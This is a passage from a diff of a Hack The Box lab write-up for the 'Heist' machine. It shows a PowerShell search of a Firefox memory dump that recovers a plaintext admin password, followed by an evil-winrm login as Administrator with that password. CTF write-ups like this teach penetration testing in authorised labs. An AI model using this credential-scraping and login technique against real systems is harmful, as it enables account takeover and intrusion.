sdbuchanan/HtB-Writeups-Retired/heist/heist.md

 ----                -------------         ------ ----
 -a----       10/10/2019   5:29 AM      466390945 firefox_6152.dmp
 ```
 Cool - so that worked, but there is a lot of shit in this thing and its something like 466MB, yikes.
-In comes the helpful get-content command: [Get-Content Manpage](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-content?view=powershell-6)
+In comes the helpful get-content command: [Get-Content manpage](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-content?view=powershell-6)

-Lets try to just look for the word password?:
+Lets try to just look for the string password?
+That seems like the easiest way, I honestly have no idea what to look for.

 ```console
 Evil-WinRM* PS C:\Users\Chase\Documents> gc firefox_6152.dmp | % { if($_match "password") {write-host %_}}

 localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
 ```
-Word - lets try to connect with that?
+Great, that seems like a password potentially - lets try to connect with that?

 ```console
 root@endeavour:~/htb/heist/evil-winrm# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'